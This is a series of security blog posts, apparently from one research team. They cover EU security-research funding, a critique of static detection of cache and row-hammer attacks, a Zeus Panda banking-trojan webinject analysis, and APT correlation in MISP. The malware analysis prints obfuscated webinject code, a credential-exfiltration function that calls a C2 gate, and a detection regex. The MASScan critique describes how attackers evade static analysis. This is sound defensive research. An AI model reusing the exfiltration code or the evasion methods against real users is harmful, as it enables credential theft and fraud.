Security for Sale? – On Security Research Funding in Europe

On Wednesday, Feb. 22. 2017, a collective of 20 journalists from eleven countries published their recherches on the European security industry. The article, Security for Sale, published at The Correspondent, mostly seems to revolve around the question of how the funding several players in the field received from Horizon 2020 (H2020) and FP7 framework programmes are put to use for the European people. H2020 is the European Commission’s current funding initiative for research and innovation. Here is the commission’s own explanation.

Simplified, the authors of Security for Sale conclude that the benefit of funding security research for the Europe as a whole is limited, but that the funding works pretty well as hidden subsidies for the industry itself. Their wording is more lenient than mine, but nevertheless I feel that the picture the authors draw is incomplete and I’d like to add another perspective. I can only assume that the data for this article stems from the Secure Societies line of funding, as its core topics are emphasized in the article and some of the articles it links to refer to that – the article does regrettably not contain any straightforward references to its sources. And in my opinion, the Secure Societies line of funding does indeed sometimes yields research results that are scary to everyone who did not answer the question of ‘how do we want to live?’ with ‘I liked the setting depicted in Minority Report quite a bit, but it’s missing the effectiveness of Judge Dredd’.

The authors describe the landscape in the security sector roughly as 1) the big players, where kinetic and digital technology converge, 2) research organizations, 3) universities, and 4) small and medium enterprises (SMEs). Our sector, of Ze Great Cybers, primarily hides in 4) and to some extent increasingly in 1). The article does not explicitly touch the field of information security and neither do many calls in the Secure Societies context, however, most of the projects need to touch the digital domain at some point or other, making it clear that a division of information security and all the other potential flavors of security is merely artificial, given our current state of technology. As the authors observe, this is also reflected by the upcoming funding opportunities:

“similar programs are being set up for cybersecurity and military research”

The EU and some of it’s member states are late to the game and I’m aware that not everybody hacking at computers likes the notion that InfoSec and defense converge. I also dislike the idea and I somehow liked the Internet better when it was still a lot emptier, or as Halvar Flake once put it:

However, I came to enjoy civilization and as most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year and as a human, who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients’ staff put into resolving the respective incidents. If this means I’m working in defense now, then I still dislike the notion, but I see that the work is necessary and also that we need to think more on the European scale when we want to protect the integrity of our societies. Packets only stop at borders of oppressive societies and that shouldn’t be us.

Now let’s have a look at where the EU’s security research funds go to, according to the article. The authors state

“Companies received by far the most money. That’s not particularly surprising; these same companies were the ones influencing funding policy.”

and illustrate it with the following figure:

funding_distribution_thecorrespondent
Figure 1: Security research funding distribution. Illustration by The Correspondent.

In 2015, I was directly responsible for four H2020 grant applications and consulted on several other applications for nationally or regionally managed funding opportunities. Security in its various flavors is a tiny part of the picture. I’m happy to state that we had an above the average success rate. The illustration in the article struck me as familiar: to me, Figure 1 simply shows a typical distribution of funding within the majority of grant applications I’ve worked on. So it is hardly surprising that the global distribution of funding within technology sector of the programme looks very similar. There is nothing much sinister to that.

Larger corporations do have more opportunities to influence policy, as they can afford the time/resources to lobby. But the main reason for the distribution is salaries on the one hand and grant policy on the other. An engineer working at a large corporation will be more expensive by factor 1.2 to 2.3 than a PhD student, depending on country and the respective corporation. A factor of ~1.9, as in the figure, does not look unreasonable, given that the figure accounts for accumulated costs, not just personnel and that it is more likely that a corporation or a research institute will take the effort of building a demonstrator or pilot installations of a technology, as universities regrettably tend to lack monetization strategies for research results.

Government entities, as the next in line, tend to have very limited personnel resources for research projects and do not have a lot of wiggle room when in comes to contributions.  With a funding scope that aims at technological advances, funding for advisories is often politically limited, and rightly so. As the figures are very much aggregated, I can only assume that the complete sum also contains Coordination and Support Actions (CSAs), which are rather limited funding schemes, financially speaking, that aim at connecting related projects and generally at the systematization of knowledge to avoid arriving at one insight at twice of thrice the funding. This work is sometimes done by entities that could classify as advisories. ‘Other’ can be translated to network and dissemination partners, or dedicated project management (which makes a lot of sense, H2020 projects can be large in terms of the number of partners).

Now let’s not talk militarizing corporations enriching themselves, as the article’s authors suggest, let’s talk research funding effectiveness. I my conversations with the granting side of research funding, it is a constant pain that there is a significant amount of research projects being funded that do not amount to a product. I have seen quite a few projects where I would judge without hesitation that the project was a WoMBaT (i.e., Waste of Money, Brains, and Time) and did primarily serve to compensate for the lack of public funding towards universities.

But that is only a small part of the picture. Another part is that there is a very expensive zone between ‘things you can publish’ and ‘things you can actually use’. Simplifying, technological progress has a tendency to increase complexity. To specify their expectations regarding the results of a funding measure, the European Commission adopted NASA’s Technology Readiness Levels (TRL). In the rather broad field of engineering, we often see the requirement for a validation under lab conditions (TRL 4), to the extent of a working prototype under field conditions (TRL 7), depending on the class of funding action. The funding of a given project often ends at that point.

Using my terminology from above, in the best case you then have something you can publish and/or show off, i.e., an interesting approach that has been shown to be feasible. Between that and monetization are the roughly two to seven years you’ll often need in engineering to go from a prototype to a product. And strictly speaking, research funding ends here, because research ends here. There are almost no publicly funded actions that will allow you to go towards product development, although piloting of a technology in the field can be funded (TRL 9). Nevertheless, either a company is now able to fund the continued development towards a product, or not. This is still a limited view, as I don’t need a new product to monetize research results. It is just as desirable to to improve an existing set of products and services, based on new research results. It is, however, by far not as visible.

Now why more so much funding for the big players? Research grants tends to have a bias towards those applicants, who were able to successfully complete a project, presented impressively in the past and are generally held in good standing. Sounds familiar? Yep,sounds like selecting talks for Black Hat or any other non-academic security conference, where the process is single-blind and the committee needs to judge based only on an abstract, not a full paper with a proper evaluation section and extensive related work. If the data is relatively poor, judgment needs to rely on the applicants reputation and previous work to some extend. And in comparison to a well-backed research paper, grant applications are in their nature always speculative, although very much more detailed than the abstract of a conference submission. If one knew how something was done in the first place, there’d be no need to call it research and there’d be no reason for a grant. The important point is not to fail, if one wants to continue receiving grants (cf. bias, above).

And that still does not fully account for the observation that big players are doing very well in grant applications. A H2020 application is a lot of work, it’s often a hundred pages just for sections 1 to 3, which can easily amount to 100 person days for the coordinator until everything is properly polished. The acceptance rate for Research and Innovation Actions can be as low as 6%. Academic Tier-1 conferences are relaxed in comparison. A small company may simply be unable to compete, economically, i.e., it cannot accept the realistic risk of putting a lot of effort into naught. It’s not as hard in other types of actions, but the risk is still significant and acceptance rates have been getting worse, not better.

“Our investigation reveals that EU security policy emphasizes technology: a high-tech solution is being sought for a societal problem.”

From an outside position I feel that I’m unable to judge the intention and the mindset of the various individuals responsible for the actual wording of the H2020 calls. The persons from this context I’ve met in the past did, however, not leave an impression of exceptional naivety. I genuinely believe that it is in the best interest of European countries and the EU to fund security research, without denying that there may be recipients of funds with a questionable ethical standard. As Europeans, we need to address these issues. I do not want to live in a militarized society and I don’t believe in solving societal problems purely through technology. However, I see a significant amount of opportunities, where usable, efficient technology can enable solutions for societal problems. Given my socialization, I may have a bias towards the security spectrum of research, but that said, I see quite a few things that can and should be done to positively impact the security of our societies. In a changing political climate, Europe needs to step up its security game, also and especially in the digital domain.

And now excuse me, I need to continue that research grant proposal. I’m not doing that for kicks and neither in pure self-interest.

MASScan & the Problems of Static Detection of Microarchitectural attacks

 

Introduction

Microarchitectural attacks have been known for more than a decade now.  The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort Irazoqui  et al. [1] puplished an interesting paper on static methods to detect microachtitetural attacks which is titled “MASScan: Stopping Microarchitectural Attacks Before Execution”.
The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to changes.

 

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. In this case, ‘attack context’ is defined as code which is either required for an attack to work, or because it improves an attacks’s performance. The list is:

Cache flushing instructions

Clflush, clflushopt
(the authors do not mention this clflushopt, but I have included it for completeness)

Non-temporal instructions

monvnti & movntdq

Timers

Counter threads, performance  counters,  rdtscp, rdtsc  instructions and attempts to set thread affinity to gain core co-location which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instruction

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop

 

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Zombie’s [5] opcode list (which unfortunately is outdated at the time of writing) 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the author’s notion.

The good part is that solid static analysis is able to effectively spot problems, and highlight them to a human analyst. Further manual analysis can be performed based on those indicators to identify malignant behavior, suspicious cases or to vet out false positives. What makes this approach somewhat challenging is the fact that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers try to actively evade static analysis.
The following is to demonstrate what such an evasive action might look like.

 

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties are undecidable. In short, obfuscation is difficult to deal with. The bad news is that microarchitectural attacks are non-trivial semantic expressions and as such, as per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without being able to pinpoint the “right” way. You will never be able to deduce from the semantic output which all syntax representation that cause it.

The example I like to use is this: One could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics, but a different syntax. Obviously one could then build a new interpreter that processes the first interpreter’s syntax output and so on and so forth. Consequently, we cannot generate a database of syntax representation for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation or obfuscation for that matter. They often rely on rare syntax elements (rare instructions). Execution time is a very real concern and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean it’s impossible.

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instructions can replaced by eviction code as demonstrated by Oren et al. [2] as well as  Gruss et al [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush for use as an answer to a semantic question.

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign for such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounters API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways. This makes a static analysis fairly cumbersome.

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonic increasing, only deterministically changing. As the CPU’s are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged.  This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASRL) can be repeated. This allows a low accuracy timer to be used multiple times and then using the law of large numbers to average out the noise.

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack could often do without them. For instance, Oren et al. [2] does prime+probe in Javascript without a fence. Flush+Reload works fairly decent without fencing as well. Also, makeshift fences can in some cases be produced by gaming reordering. For instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult to replace for an attacker. It should be noted that on Microsoft Windows the Interlocked* API functions use the lock prefix and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards in Gruss et al. [4] . Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. We could argue with a performance penalty in this case. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!

It gets worse from there: For row hammer I suggested that we do not need not use eviction. Instead, we could bring the cache coherency policy into play to cause write back into memory, see Fogh [8].  This provides yet another algorithm to detect for protection against row hammer, which of course can be implemented in many different ways.

 

Classic malware obsfuscation – Anti static analysis methods

 

Copy protections and malware has historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995. Packers go back further than that, though. Once an executable has been packed, the only code that is now available to static analysis in the first stub of the unpacker. Unfortunately, malware authors are aware of this technique and it’s even available for purchase online as part of COTS malware as a service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk or even in memory to avoid static analysis. Techniques such as “Run-PE” are widespread in real world malware.

Another example of self-modifying code is JIT compiling, which is what Javascript does. In fact, I use the keystone assembler JIT style for building microarchitectural attacks fairly often, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious java script is entirely possible and Oren et. Al demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and subsequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis is already commonplace and no longer qualifies as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed either based source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons. This only leaves disassembly as a method for analysis. Unfortunately, however, the x86 platform has a non-fixed length of opcodes. This results in problems to locate the starting point of an instruction. Historically this has been used as a means to thwart disassembly. A clflush instruction can easily be hidden from disassembly as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (In the simplest form) assembles to 3 bytes of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.

 

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. In there, the code is validated during compiling and run in a sandboxed environment to make sure that none of the above tricks are used. Validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Never-the-less requiring intermediate language representation (say LLVM) when submitting to a shop may assist the authors intention, but many of the issues mentioned above including Rice’s theorem itself applies to intermediate language representations as well.

 

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’.  We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – this is especially true if the “feature set” is small and malleable. This limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and mallable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. Static analysis could be augmented with symbolic or even concolic analysis to improve accuracy. However these methods scale poorly and have issues of their own. Given that it produces a <6% false positive ratio, static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach which I consider the most promising stop-gap-solution.
For instance, my flush+flush detection blog post [7] or my work with Herath on detecting row hammer and cache attacks at BlackHat 2015 using performance counters [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws, either. But from an attacker’s point of view they are at least more difficult to work around as they are often behavior-based and consequently circumvent the problem presented by the Rice theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.

 

Literature

[1] Irazoqui, G., Eisenbarth T., an Sunar B.  MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical  cache attacks in javascript and their implications. In Proceedings of the 22Nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in javascript.  In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment -Volume 9721 (New  York,  NY,  USA,  2016),  DIMVA  2016,  Springer-Verlag  New York, Inc., pp. 300{321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating  attacks  on  inclusive  last level  caches.   In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Nishat, H., Fogh, A. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. See also  http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. Http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI- http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Zeus Panda Webinjects: a case study

Our mothership G DATA runs extensive automated sample processing infrastructure as part of providing up to date protection to their AV customers. At G DATA Advanced Analytics, we have integrated these processes within our own routines in order to maintain the fraud detection solutions we provide to our customers from the financial sector.

We have been observing an increase in Zeus Panda infections recently. When we decrypted the config files from samples of Zeus Panda Banking Trojans that went through our processing this week, we decided to have a closer look at the current features. The low level functionality of the Zeus Panda Banking Trojan is already known quite well, so we focus our analysis on the webinjects. These webinjects are used to manipulate the functionality of the target online banking websites on the client. The one we found here was pretty interesting. As usual, the JavaScript is protected by an obfuscation layer, which substitutes string and function names using the following mapping array:

var _0x2f90 = ["", "\x64\x6F\x6E\x65", "\x63\x61\x6C\x6C\x65\x65", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x3F\x74\x69\x6D\x65\x3D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x76\x65\x72", "\x46\x46", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x63\x6F\x6D\x70\x6C\x65\x74\x65", "\x6D\x73\x69\x65\x20\x36", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x49\x45\x36", "\x6D\x73\x69\x65\x20\x37", "\x49\x45\x37", "\x6D\x73\x69\x65\x20\x38", "\x49\x45\x38", "\x6D\x73\x69\x65\x20\x39", "\x49\x45\x39", "\x6D\x73\x69\x65\x20\x31\x30", "\x49\x45\x31\x30", "\x66\x69\x72\x65\x66\x6F\x78", "\x4F\x54\x48\x45\x52", "\x5F\x62\x72\x6F\x77\x73\x2E\x63\x61\x70", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x64\x69\x73\x70\x6C\x61\x79", "\x73\x74\x79\x6C\x65", "\x6E\x6F\x6E\x65", "\x68\x74\x6D\x6C", "\x70\x6F\x73\x69\x74\x69\x6F\x6E", "\x66\x69\x78\x65\x64", "\x74\x6F\x70", "\x30\x70\x78", "\x6C\x65\x66\x74", "\x77\x69\x64\x74\x68", "\x31\x30\x30\x25", "\x68\x65\x69\x67\x68\x74", "\x7A\x49\x6E\x64\x65\x78", "\x39\x39\x39\x39\x39\x39", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64", "\x23\x46\x46\x46\x46\x46\x46"];
// ... further script code ...

After deobfuscating this script, the result looks like:

var vars = ["", "done", "callee", "script", "createElement", "type", "text/javascript", "src", "?time=", "appendChild", "head", "getElementsByTagName", "ver", "FF", "addEventListener", "DOMContentLoaded", "readyState", "complete", "msie 6", "indexOf", "toLowerCase", "userAgent", "IE6", "msie 7", "IE7", "msie 8", "IE8", "msie 9", "IE9", "msie 10", "IE10", "firefox", "OTHER", "_brows.cap", "getElementById", "display", "style", "none", "html", "position", "fixed", "top", "0px", "left", "width", "100%", "height", "zIndex", "999999", "background", "#FFFFFF"];
// ... further script code ...

Taking a closer look at the now revealed functionality, we can identify the following features:

  • Browser version check, to add a browser specific event listener (e.g. for Firefox the DOMContentLoaded event is used)
  • Setting some trojan configuration variables like:
    • botid: Unique Identifier of the compromised system
    • inject: URL to load the next attack stage
  • Load and execute further target (bank) specific JavaScript code, as defined in the inject variable.

As it turns out, the first webinject stage is a generic loader to get target specific attack code from a web server. In this context ‘target’ refers to banks and payment service providers. This is not a remarkable fact in itself, as current webinjects tend to load the final attack in multiple stages. But maybe this server also includes further Zeus Panda components. So let’s take a closer look.

Target specific code and examples

After downloading the target specific second stage of the webinject, we were surprised about the actual size of the file: 91.8 KB.

A brief analysis showed a lot of functionality. Some of the functions are generic and work on every website. Others include target specific code, like specific HTML attributes. For example, the webinject uses unique id attributes to identify concrete websites of the online banking target. We are still investigating a lot of the included functionality at the time of writing. For now, we want to give a brief overview of selected parts of the basic functionality.

init_function_start
Figure 1: Flowchart of init function

After loading the target specific JavaScript, the init function shown in figure [Figure 1] is called. First, the function checks if it is on top of the page. If not, the showpage() function is called, searches for the identifier _brows.cap and deletes this DOM element if present. Otherwise the next check function are() is called, which searches for the strings “login”, “password” and “button”. If none of these strings can be found, the get() function is called to check if the user is currently logged in. This is done by checking for the presence of the logout element, which is only available when the user is currently logged in. If not, the already described showpage() function is triggered to clean up. Otherwise the status() function is used to set the status variable to the string “CP”. Afterwards the collected data is exfiltrated via the send() function, described in detail in the next section.

If all target strings were found (“login”, “password” and “button”), the next functions preventDefault() and stopPropagation() are called (left branch of figure 1). This overwrites the the default form action to collect the data the user enters into the form. Additionally the key event of the enter button (key code 13) is intercepted so that the form data is captured regardless of the submit method.

As this implementation is not working in Internet Explorer, the script checks for the presence of the cancelBubble event. If present, a specific Internet Explorer implementation is called, which provides the same functionality as the stopPropagation() function. As in the initial webinject, different code is available to support all major browsers.

After collecting form input data, the function status() is called to set the branch variable. The branch variable defines which action is triggered. In our callflow example (left branch), the value is set to the string “SL” which triggers a visible overlay of the website, indicating to the user that there is a temporary problem with the site. The following examples show two different target variations:

screen_status_sl_02
Figure 2: German example for a temporarily unavailable
screen_status_sl
Figure 3: English example of a different target

Afterwards the send() function is triggered to exfiltrate the collected data.

Exfiltration

The next interesting part in the code is the exfiltration function used during this attack stage. The collected information is handed to a function called send():
send: function () {
    var l = link.gate + '?botid=' + _tables.encode(_brows.botid) + '&hash=' + new Date() + '&bname=' + _tables.get('bank');
    for (var i = 0; i < arguments.length; i++) {
        for (key in arguments[i]) {
            l += '&' + key + '=' + _tables.encode(arguments[i][key]);
        }
    }
// ... further code ...
This function simply sets all collected data as GET Parameters and sends a HTTPS request to a PHP backend, defined in the variable link.gate. Depending on the target website, we could observe different parameters and small differences in the construction of the parameter values. The following list gives an overview of identified parameters. This list is not complete and some of the parameters are optional. All parameters are send in plain text to the C2 backend.
Paramter name
Value
botid Unique client identifier
bname Target identifier
hash Timestamp (new Date())
login1 user name
login2 user password
type module type (grabber, ats, intercepts)
param1 start
domain document.location
branch Status to trigger different functionalities
We intend to provide further details in a follow-up post. However, now we need to talk about the backend. Behold the Zeus Panda administration panel:

Admin Panel Details

The webinject code naturally led us to C2 servers and a closer analysis led us to an admin panel on one of the servers we investigated.

overview_table
Figure 4: Admin-Panel

Figure 4 displays the start screen of the Admin-Panel. Every infected machine is displayed in one row. For every entry the following information is listed:

  1. BotId: Unique identifier for the compromised system
  2. The active module type
  3. Job status of the entry
  4. Login credentials (username/password)
  5. Account status
  6. Victim IP address
  7. Timestamp of infection
  8. Browser version
  9. Target URL (bank)

The top navigation bar lists some available filters like format settings, drop zones and further configuration settings.

The panel is used by the attacker to see new victim machines and available actions. By clicking on the entries, the attacker can view detailed information about the compromised user. For example, details like the account balance of the victim, the amount available for transfer and even the transaction limit can be displayed. Furthermore the attacker can attach notes to the specific victim, to keep track of his fraudulent actions.

overwied_detailed_01
Figure 5: Admin-Panel detail view

Conclusion

Banking Trojans are still one of the most valuable sources of income for criminals online. Given the fact that this kind of malware has been developed and optimized for many years, it’s not surprising that we can observe rather a high code quality. With the Admin-Panel, the attacker has a way to manage the compromised machines without the need to know  technical infection details, making this kind of revenue stream accessible also to the technically rather illiterate.

In the follow-up blog post, we will take a closer look into target specific webinject scripts.

Indicators of compromise

Script-Stage
IoC
Functionality
1st stage SHA256: d8444c2c23e7469a518b303763edfe5fd38f9ffd11d42bfdba2663b9caf3de06 Loader
1st stage
initial webinject
_brows.botid

_brows.inject
Loader
2nd stage SHA256: a99e2d6ec2a1c5b5e59c544302aa61266bb0b7d0d76f4ebed17a3906f94c2794 Exfiltration
2nd stage
target specific
\.php\?(&?(botid|hash|bname|login1|login2|type|param1|domain|branch)=[^&]*){4,9}$ Exfiltration

Authors: Manuel Körber-Bilgard and Karsten Tellmann

The Kings In Your Castle Part 5: APT correlation and do-it-yourself threat research

Welcome back, to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how A.P.T. functions, how targeted malware looks like and the issues us analysts might find on it. If you are interested on how it started, please check out the parts 1, 2, 3 and 4; namely here, here, here and here.

In part 5 now I will describe how we leveraged our gathered data for correlations, to unveil connections among targeted attacks, reported to CIRCL’s MISP instance. Furthermore, this blog looks ahead on what happened after the presentation of our proof of concept at this year’s Troopers conference in Heidelberg. Large parts of the parsing and correlation functionality has made its way into the code base of MISP. Raphael Vinot has published the MISP Workbench, where MISP users can now perform their own correlation of events found in MISP.

Corre…what?

For starters, let’s define the term “correlation”. We define this as the uncovering of links of any kind among events reported to MISP. A requirement for reports that support a correlation is that they refer to one single event which goes beyond the general information already contained in MISP. Through this correlation we can glean extended knowledge of a toolset used by an actor as well as information on target preference. We also get to know about shared tools or techniques among two or more actors. We would also count it as a successful correlation if we find proof that two supposedly related events do not share any links at all.

A big step from classical (mass-)malware detection to research and mitigation of targeted attacks was, to recognize a pattern over time. The fundamental difference between targeted and non-targeted threats is that non-targeted threats does not know and/or care about their target. While campaigns of non-targeted threats also tend to improve over time, targeted actors have a significantly more developed need to stay ahead of their victims. This way, when tracking threat actors, one might spot new additions to their toolset, new intrusion techniques or even see them picking up new “business lines”.

Also, looking at malware campaigns from a historical perspective helps uncovering false flags as well as attempts to cover their tracks. This is especially significant when looking at how actors learned to do this over time.

With all of this reasoning in mind we dug through data sets with (and, occasionally, without) structured approaches, in order to unveil hidden treasures.

Naming is hard

And frequently, when uncovering supposably unknown links among different events, we found ourselves poking at the very same group of aggressors; using the very same malware and attack methods as the linked event would show. But how come?

There are several reasons to this, the most obvious one being that two events were reported, commenting on differently named groups, but actually referring to the same. This is an old issue in threat analytics; naming is hard. The reality was that in most common cases we quickly realized that each time we had a link, we were looking at identical events that were just named differently.

Probably the most popular case of multi-naming is Havex; otherwise known as EnergeticBear, DragonFly, or CrouchingYeti. This group has been mentioned in at least four different reports, with dedicated naming on all four. Similar cases have been observed for Sakula, also called BlackVine, and for WhiteElephant, also called Seven Pointed Dagger.

5_2_naming

What we found

The purpose of correlating different events was to try and find any existing links between events that were either instigated by different actors and/or performed at different points in time by the same group. For one, we wanted to proof that we could uncover links among sample sets and groups with little technical effort. For instance, we were able to spot a spear phishing attack within MISP which clearly related to other campaigns driven by an actor known as APT1. APT1 is said to be a Chinese group, performing a plentitude of attacks in (years?). It is hugely beneficial to have advance knowledge of past attacks and current changes to an attacker’s toolset. This is especially true if an attack by a specific group against a given target may be imminent or already in progress.

What turned out interesting also though, was uncovering events documenting the same group, but extending the view to include  the capabilities which were added over time. One example for this is TurboCampaign. This was first reported in 2014. By that time it went by the name of Shell_Crew. When spotted again in 2015, they sported a 64-bit Derusbi implant for Linux machines, which had not been observed earlier. It is unclear at this point, whether this component was just missed in the 2014 report or if it was added less than a year later. The fact that attack groups learn as they go and extend their toolset is not surprising. This learning process gives us exactly the kind of information we set out to learn.

Other things we found in similar ways were for example a link between a report on The Dukes and another campaign dubbed Hammertoss; we linked an RTF spearphishing campaign from 2014 to the PittyTiger group, and we discovered a connection between RedOctober and the Inception Framework.

How to determine what’s related

We should underline again that what we did was not yet another machine learning exercise. The attributes outlined in previous episodes of this series can potentially serve in malware machine learning research, but exploring this was out of scope for what we had in mind. But what DID we do then?

We followed a rather simple approach. The set of indicators mentioned in blogpost #2, combined with attributes already present within MISP, went into a Redis backend, hosted on strong computing power. Redis allows, to perfom rather quick queries on large datasets in memory. By calculating hashes to index data items, large sets can be processed from different angles.

This way we can perform correlation runs based on IP addresses, domain names and file hashes, as well as compilation timestamps, original file names, import table and ssdeep hashes and many more. As outlined mentioned last time, targeted malware is likely to not be packed or obfuscated. It is also likely to be reused, either in its compiled form or only parts of its source code.

The following graphic illustrates a snapshot of data, related to one event within MISP. One can quickly identify certain patterns, as well as absent data. Naturally, PE-specific attributes can only be retrieved from Windows PE binaries. Help on that front is provided by ssdeep hashes, which also serve for file clustering approaches.

5_3_data

Ssdeep clustering

Ssdeep, apart from computing a piece-wise hash of a given file or data blob, is capable of measuring the distance between two or among multiple ssdeep hashes. These distances are named match scores, weighed measures of how similar two given files are to each other. This is possible because of the fact that ssdeep does not calculate cryptographical hashes, which identify the entire file, but only pieces of a file. Those can then be compared to the piecewise hash of a different file. Naturally, this method can be extended to compare multiple files to one file, and also looking into groups of files, calculating distances among all of those.

This principle allows for clustering of files, based on ssdeep hashes. The most popular implementation of ssdeep clustering, and also the one we based our toolchain on, is ssdc by Brian Wallace. As extension to the original implementation of ssdc, we added a multi-process computation module and a Redis connector, to be able to store clustering results directly to the backend.

This way we are able to spot events which are “close” to each other based on similarities within the involved binaries. With this information one could, for instance, establish that a group targeting entities within Russia, is using malware which bears disturbing similarities to malware used by a (different..?) group targeting entities within Afghanistan and Tajikistan. Just saying….

Ssdeep clustering challenges

Processing fuzzy hashes is a very resource intensive task, even more so when clustering samples of them. This doesn’t scale well for sample sets of certain sizes. Our test set is limited, but given that most malware repositories deal with a sample size within the hundred thousands or bigger, some presorting of groups of interest might be feasible. This pre-sorting of samples which match a certain set of criteria (e.g. events of within a specific timeframe, targeted platforms only geographical constraints) can speed up the clustering approach significantly.

